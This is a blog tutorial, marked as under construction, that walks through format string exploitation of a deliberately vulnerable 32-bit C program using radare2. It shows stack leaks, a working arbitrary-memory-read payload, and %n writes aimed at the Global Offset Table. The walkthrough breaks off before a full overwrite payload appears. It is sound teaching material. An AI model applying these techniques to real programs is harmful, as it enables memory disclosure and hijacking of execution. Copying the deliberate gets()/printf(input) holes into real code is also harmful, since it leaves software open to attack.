2017-03-25

Format String Exploitation 00: testGOTwrite

POST STILL UNDER CONSTRUCTION

In an effort to better understand format string exploitation, I constructed the following trivial example and decided to write a walkthrough for it.

This example is ideal for those of you who are just getting into exploitation and want to see how a simple format string exploit works.

Consider the following example:

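#include <stdio.h>
#include <stdlib.h>

/* Our target: nothing in the program ever calls this. */
void victory(){
    printf("Somehow you've won...\n");
}

void printStuff(){
    char input[100];
    gets(input);    /* unbounded read: a stack overflow is possible too */
    printf(input);  /* user input used as the format string: the bug */
}

int main(){

    printStuff();
    exit(0);

}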

If you've never abused printf() in the way I'm about to show you, it isn't obvious how the above program's execution flow could be redirected through printf(). Our first goal will be to call the victory() function, which nothing in the program ever calls. Generalizing the technique, however, can lead to arbitrary code execution, such as spawning /bin/sh.

Even though a buffer overflow is also possible here (gets() does no bounds checking), we'll assume for the sake of example that stack smashing is off the table.

We can compile this program using:

-> % /usr/bin/gcc -m32 ./testGOTwrite.c -o testGOTwrite

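However, if you'd like to use the provided sample exploit, you can download all the necessary files here: testGOTwrite.7z. If you compile the program yourself, the provided payload most likely won't work, and its addresses will have to be adjusted to match your binary. On toolchains that build position-independent executables by default, you may also need to add -no-pie for the binary to load at 0x08048000 as it does throughout this post.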

Now that we have the binary in hand, run it and see what happens:

-> % ./testGOTwrite 
HERPDERP
HERPDERP%
-> % ./testGOTwrite
%x.%x.%x.%x
1.f77a18f8.f7609eb3.ff8102ea%

Notice that on the first invocation the input string is merely echoed back to you, while on the second, some strange hex numbers appear in place of each %x. This is in fact data from the stack. To see what is happening in greater detail, let's fire up radare2:

-> % r2 -d testGOTwrite
Process with PID 6687 started...
= attach 6687 6687
bin.baddr 0x08048000
Using 0x8048000
Assuming filepath /home/tobaljackson/programming/c/exploit/format_string/testGOTwrite
asm.bits 32
 -- All your base are belong to r2

After loading the binary, we use aaa to analyze all functions:

[0xf77d9bd0]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
TODO: esil-vm not initialized
Cannot determine xref search boundaries
[x] Analyze len bytes of instructions for references (aar)
[x] Analyze function calls (aac)
[ ] [*] Use -AA or aaaa to perform additional experimental analysis.
[x] Constructing a function name for fcn.* and sym.func.* functions (aan))
= attach 6687 6687

Next, we seek to the printStuff() function and set a breakpoint on its call to printf():

[0xf77d9bd0]> s sym.printStuff
[0x080484b4]> pdf
/ (fcn) sym.printStuff 39
|   sym.printStuff ();
|           ; var int local_6ch @ ebp-0x6c
|              ; CALL XREF from 0x080484ec (sym.main)
|           0x080484b4      55             push ebp
|           0x080484b5      89e5           mov ebp, esp
|           0x080484b7      83ec78         sub esp, 0x78               ; 'x'
|           0x080484ba      83ec0c         sub esp, 0xc
|           0x080484bd      8d4594         lea eax, dword [ebp - local_6ch]
|           0x080484c0      50             push eax
|           0x080484c1      e88afeffff     call sym.imp.gets          ; char*gets(char *s)
|           0x080484c6      83c410         add esp, 0x10
|           0x080484c9      83ec0c         sub esp, 0xc
|           0x080484cc      8d4594         lea eax, dword [ebp - local_6ch]
|           0x080484cf      50             push eax
|           0x080484d0      e86bfeffff     call sym.imp.printf        ; int printf(const char *format)
|           0x080484d5      83c410         add esp, 0x10
|           0x080484d8      90             nop
|           0x080484d9      c9             leave
\           0x080484da      c3             ret
[0x080484b4]> db 0x80484d0

We're now poised to run the program, providing our input and seeing what the stack looks like just before printf() is called:

[0x080484b4]> dc
Selecting and continuing: 6687
%x.%x.%x.%x
hit breakpoint at: 80484d0
[0x080484b4]> pxw 80 @ esp
0xffed8a70  0xffed8a8c 0x00000001 0xf77fd8f8 0xf7665eb3  .............^f.
0xffed8a80  0xffed8aaa 0x00000000 0xf77e2830 0x252e7825  ........0(~.%x.%
0xffed8a90  0x78252e78 0x0078252e 0x00c30000 0x00000000  x.%x.%x.........
0xffed8aa0  0xf77fcfc4 0xf77fd8f8 0xffed8ac0 0x0804827c  ............|...
0xffed8ab0  0x00000000 0xffed8b54 0xf778e000 0x00000016  ....T.....x.....

After supplying the input string %x.%x.%x.%x, we use the pxw command to print 80 bytes of the stack. Look at the first line of the dump and notice that after the stack address (0xffed8a70) we have some familiar looking output. Since this is a 32-bit binary, which passes arguments on the stack, the top stack word (0xffed8a8c) is the first argument to printf() (the pointer to our format string), while the next 4 stack words are what get printed by the four %x specifiers.

This works because printf() is variadic: it has no way of knowing how many arguments its caller actually pushed, so each conversion specifier simply consumes the next word after the format-string pointer as if it were an argument. Since our format string was four copies of %x separated by dots, the printed stack words are dot-delimited, making the program output easy to read.
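To make the "next word" behavior concrete, here is a toy model in C. It is a sketch, not glibc's implementation: toy_printf_x() is a hypothetical helper that only understands %x, and its words array stands in for the stack words sitting just above the format-string pointer (the values below are taken from the pxw dump above).

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy model (hypothetical, not glibc's code) of printf()'s argument walk.
 * words_after_fmt[] plays the role of the stack words just above the
 * format-string pointer; every %x consumes the next one, whether or not
 * the caller ever pushed it. Only %x is understood. */
static void toy_printf_x(char *out, size_t outsz, const char *fmt,
                         const uint32_t *words_after_fmt)
{
    size_t next = 0; /* internal "argument pointer" */
    size_t len = 0;  /* characters written to out so far */

    if (outsz == 0)
        return;
    out[0] = '\0';
    for (const char *p = fmt; *p != '\0' && len + 1 < outsz; p++) {
        if (p[0] == '%' && p[1] == 'x') {
            int n = snprintf(out + len, outsz - len, "%x",
                             (unsigned)words_after_fmt[next++]);
            if (n < 0 || (size_t)n >= outsz - len)
                break; /* error or truncated output: stop here */
            len += (size_t)n;
            p++; /* skip the 'x' */
        } else {
            out[len++] = *p; /* ordinary character: copy it through */
            out[len] = '\0';
        }
    }
}
```

Fed the four words that follow the format-string pointer in the dump (0x1, 0xf77fd8f8, 0xf7665eb3, 0xffed8aaa) and the format %x.%x.%x.%x, the toy produces 1.f77fd8f8.f7665eb3.ffed8aaa, the same shape of output the real program printed earlier.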

Note that when debugging a program that reads from stdin and writes to stdout in radare2, the program's output doesn't always show up on the command line.
This is a prime reason to redirect the program's stdin, stdout, or both to another terminal. (See "Debugging a Program by Redirecting IO to Another Terminal")

Notice also that in the stack dump above we can see our original format string itself, starting at address 0xffed8a8c (the pointer on top of the stack points to it). This is both interesting and important. What happens if we supply enough format specifiers to reach our original input string?

Observe:

-> % ./testGOTwrite
AAAA%x.%x.%x.%x.%x.%x.%x.%x.%x
AAAA1.f77848f8.f75eceb3.fff9770a.0.f7769830.41414141.252e7825.78252e78

Here we've prefixed our input string with four A's to make it easy to spot when printf() reaches our input string on the stack. Since the hexadecimal representation of A is 0x41, we can see that 41414141 is the 7th word printed, i.e. the 7th word after the format-string pointer. printf() also supports positional arguments (a POSIX extension to C), which let us skip the first 6 words and jump straight to the 7th:

-> % ./testGOTwrite
AAAA%7$x
AAAA41414141

By inserting 7$ between the % and the x, we told printf() to use the 7th argument for this conversion instead of the next one in line. Well, how is this useful?
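Two small C sketches of what just happened. arg_index() (a hypothetical helper) redoes the arithmetic behind the magic 7: at the breakpoint, esp (0xffed8a70) holds the format-string pointer and our buffer starts at 0xffed8a8c, which is 0x1c bytes, or 7 words, higher. positional_demo() (also a hypothetical name) shows the same N$ syntax used legitimately; positional conversions come from POSIX rather than ISO C, and glibc supports them.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Which positional index ("%N$x") reaches our buffer? At the call to
 * printf(), esp points at the format-string pointer and argument N lives
 * N words above it, so N = (buffer address - esp) / 4 on a 32-bit target. */
static uint32_t arg_index(uint32_t esp_at_call, uint32_t buf_addr)
{
    return (buf_addr - esp_at_call) / 4u;
}

/* Positional conversions: "%2$s" consumes the 2nd argument after the
 * format string and "%1$s" the 1st, in whatever order they appear. */
static void positional_demo(char *out, size_t outsz)
{
    snprintf(out, outsz, "%2$s %1$s", "world", "hello");
}
```

With the addresses from our dump, arg_index(0xffed8a70, 0xffed8a8c) gives 7, matching what we found by counting %x's, and positional_demo() produces "hello world".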

Whereas most of printf()'s format specifiers interpret their arguments as immediate values (simply printing them as text), there are two notable exceptions that treat the argument as a pointer: %s and %n.

The %s format specifier dereferences the argument in an attempt to print the string/characters at the specified memory address. Can you see where I'm going with this?

Let's try it:

-> % ./testGOTwrite
%s
[1]    20278 segmentation fault (core dumped)  ./testGOTwrite

Hmm, a SEGFAULT. What went wrong? Looking back at our output above, the first word printf() consumes has been 0x1, which is not a mapped address. So when printf() tries to dereference 0x1 to read a string, the program crashes. Let's try again, but with a valid memory address.

Read memory primitive

We'll use rabin2 to get main's address, then use echo to write that address in little-endian byte order in front of our format string:

-> % rabin2 -M ./testGOTwrite                        
[Main]
vaddr=0x080484db paddr=0x000004db

-> % echo -e '\xdb\x84\x04\x08%7$s' | ./testGOTwrite      
ۄ�L$����q�U��Q���������
                         j%                                                   

-> % echo -e '\xdb\x84\x04\x08%7$s' | ./testGOTwrite | xxd
00000000: db84 0408 8d4c 2404 83e4 f0ff 71fc 5589  .....L$.....q.U.
00000010: e551 83ec 04e8 c3ff ffff 83ec 0c6a       .Q...........j

From the output above, we can see that the first run prints a bunch of gibberish. Viewed through xxd, however, the gibberish turns out to be a sequence of raw bytes. The first four bytes, db84 0408, are the address we entered. But what about the bytes that follow? Since we chose main's address, we should expect to see the machine code at the start of main. Back in radare2:

[0xf7711bd0]> s main
[0x080484db]> pd 10
            ;-- main:
            0x080484db      8d4c2404       lea ecx, dword [esp + 4]    ; 0x4 ; 4
            0x080484df      83e4f0         and esp, 0xfffffff0
            0x080484e2      ff71fc         push dword [ecx - 4]
            0x080484e5      55             push ebp
            0x080484e6      89e5           mov ebp, esp
            0x080484e8      51             push ecx
            0x080484e9      83ec04         sub esp, 4
            0x080484ec      e8c3ffffff     call sym.printStuff
            0x080484f1      83ec0c         sub esp, 0xc
            0x080484f4      6a00           push 0

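Lo and behold, we have hijacked printf() to read memory of the running process! Compare the instruction bytes in the middle column with the xxd output above (starting after db84 0408 with 8d4c...). Notice that the bytes stop only when a 00 byte is reached, the normal string terminator. This primitive can read any mapped address, with two caveats: each read stops at the first null byte, and the address itself must not contain a 0x00 byte (which would end the format string before %7$s) or a 0x0a byte (which would end gets()'s input).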
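The payload we piped in with echo can also be generated programmatically. Below is a minimal sketch; build_read_payload() is a hypothetical helper name, and it assumes, as with this binary, a 32-bit little-endian target where our buffer is reachable as argument 7. It refuses addresses containing 0x00 or 0x0a, the two bytes that would cut the payload short.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: write "<addr as 4 little-endian bytes>%<pos>$s"
 * into out, the same bytes our echo command fed to testGOTwrite.
 * Returns the payload length, or -1 if the buffer is too small or the
 * address contains 0x00 (ends printf's format string) or 0x0a (ends
 * gets()'s input). */
static int build_read_payload(unsigned char *out, size_t outsz,
                              uint32_t addr, int pos)
{
    if (outsz < 4)
        return -1;
    for (int i = 0; i < 4; i++) {
        unsigned char b = (unsigned char)(addr >> (8 * i)); /* LSB first */
        if (b == 0x00 || b == 0x0a)
            return -1;
        out[i] = b;
    }
    /* "%%" emits a literal '%', so this appends e.g. "%7$s" */
    int n = snprintf((char *)out + 4, outsz - 4, "%%%d$s", pos);
    if (n < 0 || (size_t)n >= outsz - 4)
        return -1;
    return 4 + n;
}
```

For main's address, build_read_payload(buf, sizeof buf, 0x080484db, 7) yields the 8 bytes db 84 04 08 followed by %7$s. An address such as 0x0804a00c (printf's GOT slot) packs fine, while 0x0804a000 is rejected because its low byte is 0x00.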

Being able to read memory is pretty great. We can use it, for instance, to leak data from the Global Offset Table, which we do in the time_is challenge solution. But for this example printf() exploit, we only need to write data.

Enter the Drago%n

As mentioned earlier, the %n specifier is similar to %s in that its argument is treated as a pointer rather than an immediate value. Where it differs, though, is that instead of reading from that address, it writes to it: %n stores the number of characters printed so far, as an int, at the given address.
Let that sink in.
printf() can write data to memory.
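Here is a minimal, benign sketch of %n in ordinary C (percent_n_demo() is a hypothetical name). The format strings are fixed literals, so nothing here is exploitable, but it shows both what %n stores and how a field width such as %20x inflates that count without anyone having to type 20 characters.

```c
#include <assert.h>
#include <stdio.h>

/* %n stores, through an int pointer, the number of characters output
 * so far. A field width pads the output, which raises that number. */
static void percent_n_demo(int *plain, int *padded)
{
    char buf[64];

    /* "AAAA" is 4 characters, so 4 is written to *plain */
    snprintf(buf, sizeof buf, "AAAA%n", plain);

    /* "AAAA" plus 0x41 padded to 20 columns: 24 is written to *padded */
    snprintf(buf, sizeof buf, "AAAA%20x%n", 0x41u, padded);
}
```

Pointing %n at an attacker-chosen address instead of a local variable, the same way %7$s read from main's address above, is what turns this into a write primitive.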

Let's try it out. First, we'll use radare2 to look at the memory map to see what's writable:

[0x080484b4]> dm
sys   4K 0x08048000 * 0x08049000 s -r-x /testGOTwrite /testGOTwrite ; map._testGOTwrite._r_x
sys   4K 0x08049000 - 0x0804a000 s -r-- /testGOTwrite /testGOTwrite ; map._testGOTwrite._rw_
sys   4K 0x0804a000 - 0x0804b000 s -rw- /testGOTwrite /testGOTwrite ; obj._GLOBAL_OFFSET_TABLE_
sys 1.7M 0xf755a000 - 0xf7713000 s -r-x /usr/lib32/libc-2.25.so /usr/lib32/libc-2.25.so
sys   4K 0xf7713000 - 0xf7714000 s ---- /usr/lib32/libc-2.25.so /usr/lib32/libc-2.25.so
sys   8K 0xf7714000 - 0xf7716000 s -r-- /usr/lib32/libc-2.25.so /usr/lib32/libc-2.25.so
sys   4K 0xf7716000 - 0xf7717000 s -rw- /usr/lib32/libc-2.25.so /usr/lib32/libc-2.25.so ; edi
sys  12K 0xf7717000 - 0xf771a000 s -rw- unk0 unk0
sys   8K 0xf7767000 - 0xf7769000 s -rw- unk1 unk1
sys   8K 0xf7769000 - 0xf776b000 s -r-- [vvar] [vvar] ; map._vvar_._r__
sys   8K 0xf776b000 - 0xf776d000 s -r-x [vdso] [vdso] ; map._vdso_._r_x
sys 136K 0xf776d000 - 0xf778f000 s -r-x /usr/lib32/ld-2.25.so /usr/lib32/ld-2.25.so ; map._usr_lib32_ld_2.25.so._r_x
sys   4K 0xf7790000 - 0xf7791000 s -r-- /usr/lib32/ld-2.25.so /usr/lib32/ld-2.25.so ; map._usr_lib32_ld_2.25.so._rw_
sys   4K 0xf7791000 - 0xf7792000 s -rw- /usr/lib32/ld-2.25.so /usr/lib32/ld-2.25.so
sys 132K 0xff808000 - 0xff829000 s -rw- [stack] [stack] ; map._stack_._rw_

The third line above shows that the memory region 0x804a000 - 0x804b000 is writable. First, let's look at it and see what it is:

[0x080484b4]> s 0x804a000
[0x0804a000]> pd 10
            ;-- section_end..got:
            ;-- section..got.plt:
            ;-- section_end.GNU_RELRO:
            ;-- _GLOBAL_OFFSET_TABLE_:
            0x0804a000      149f           adc al, 0x9f   ; section 24 va=0x0804a000 pa=0x00001000 sz=32 vsz=32 rwx=--rw- .got.plt
            0x0804a002      0408           add al, 8
            0x0804a004      0000           add byte [eax], al
            0x0804a006      0000           add byte [eax], al
            0x0804a008      0000           add byte [eax], al
            0x0804a00a      0000           add byte [eax], al
            ;-- reloc.printf_12:
            0x0804a00c      .dword 0x08048346                           ; RELOC 32 printf
            ;-- reloc.gets_16:
            0x0804a010      .dword 0x08048356                           ; RELOC 32 gets
            ;-- reloc.puts_20:
            0x0804a014      .dword 0x08048366                           ; RELOC 32 puts
            ;-- reloc.exit_24:
            0x0804a018      .dword 0x08048376                           ; RELOC 32 exit

This here is the Global Offset Table!

Got GOT?

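So what is this fabled Global Offset Table anyway? I could go into a very lengthy and technical explanation, but this blog post covers the nitty-gritty pretty well. At a very high level, the GOT and the PLT (Procedure Linkage Table) work together to resolve shared library functions dynamically at runtime: with lazy binding, each imported function's GOT entry starts out pointing back into the PLT and is replaced with the function's real address the first time the function is called. We can illustrate this like so: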

[0x0804a000]> ood
Wait event received by different pid 22602
Process with PID 23143 started...
File dbg:///testGOTwrite  reopened in read-write mode
= attach 23143 23143
Assuming filepath /testGOTwrite
[0xf77c9bd0]> s 0x0804a000
[0x0804a000]> pd 11
            ;-- section_end..got:
            ;-- section..got.plt:
            ;-- section_end.GNU_RELRO:
            ;-- _GLOBAL_OFFSET_TABLE_:
            0x0804a000      149f           adc al, 0x9f   ; section 24 va=0x0804a000 pa=0x00001000 sz=32 vsz=32 rwx=--rw- .got.plt
            0x0804a002      0408           add al, 8
            0x0804a004      0000           add byte [eax], al
            0x0804a006      0000           add byte [eax], al
            0x0804a008      0000           add byte [eax], al
            0x0804a00a      0000           add byte [eax], al
            ;-- reloc.printf_12:
            0x0804a00c      .dword 0x08048346                           ; RELOC 32 printf
            ;-- reloc.gets_16:
            0x0804a010      .dword 0x08048356                           ; RELOC 32 gets
            ;-- reloc.puts_20:
            0x0804a014      .dword 0x08048366                           ; RELOC 32 puts
            ;-- reloc.exit_24:
            0x0804a018      .dword 0x08048376                           ; RELOC 32 exit
            ;-- reloc.__libc_start_main_28:
            0x0804a01c      .dword 0x08048386                           ; RELOC 32 __libc_start_main

The ood command makes radare2 re-open the binary, which places us at 0xf77c9bd0, the dynamic loader's entry point inside ld.so: before the binary's own entry point, and well before main() is called. So what we see here are the unresolved values stored for each imported function. They start at 0x8048346 and are spaced 16 bytes apart. Notice that these addresses fall in the .plt section of the binary:

[0x0804a000]> iS~80483
idx=11 vaddr=0x08048308 paddr=0x00000308 sz=35 vsz=35 perm=--r-x name=.init
idx=12 vaddr=0x08048330 paddr=0x00000330 sz=96 vsz=96 perm=--r-x name=.plt
idx=13 vaddr=0x08048390 paddr=0x00000390 sz=8 vsz=8 perm=--r-x name=.plt.got
idx=14 vaddr=0x080483a0 paddr=0x000003a0 sz=450 vsz=450 perm=--r-x name=.text
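The arithmetic behind those addresses can be written down as a short C sketch. The constants are read off the listings above: .plt starts at 0x08048330 and is 96 bytes long, i.e. six 16-byte stubs, and .got.plt starts at 0x0804a000 with three reserved words before printf's slot at 0x0804a00c. The stub layout it assumes (a 6-byte jmp through the GOT slot, then a push and a jmp) is the standard non-PIE i386 PLT and is consistent with the push/jmp pair at 0x8048386 disassembled next, but it is an assumption here rather than something shown in full. got_slot() and got_initial_value() are hypothetical helper names.

```c
#include <assert.h>
#include <stdint.h>

/* Layout of this binary, read off the radare2 listings (assumption: the
 * standard non-PIE i386 PLT, 16 bytes per stub, PLT0 shared by all). */
#define PLT_BASE     0x08048330u
#define PLT_STUB_SZ  16u
#define GOT_PLT_BASE 0x0804a000u
#define GOT_RESERVED 3u /* words reserved at the start of .got.plt */

/* Address of the GOT slot for the i-th import
 * (0 = printf, 1 = gets, 2 = puts, 3 = exit, 4 = __libc_start_main). */
static uint32_t got_slot(unsigned i)
{
    return GOT_PLT_BASE + 4u * (GOT_RESERVED + i);
}

/* Value held in that slot before the function is first resolved: the
 * address 6 bytes into the function's own stub (stub i + 1, after PLT0),
 * just past the 6-byte "jmp [GOT slot]" that begins the stub. */
static uint32_t got_initial_value(unsigned i)
{
    return PLT_BASE + PLT_STUB_SZ * (i + 1u) + 6u;
}
```

For printf (i = 0) this gives slot 0x0804a00c holding 0x08048346, and for __libc_start_main (i = 4) slot 0x0804a01c holding 0x08048386, matching the listing above.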

Let's disassemble the code that the __libc_start_main entry points to:

[0x0804a000]> pd 2 @ 0x8048386
        |   0x08048386      6820000000     push 0x20                   ; 32
        `=< 0x0804838b      e9a0ffffff     jmp 0x8048330

Hmm, so we just push 0x20 onto the stack and jump to 0x8048330, the very start of the .plt section.
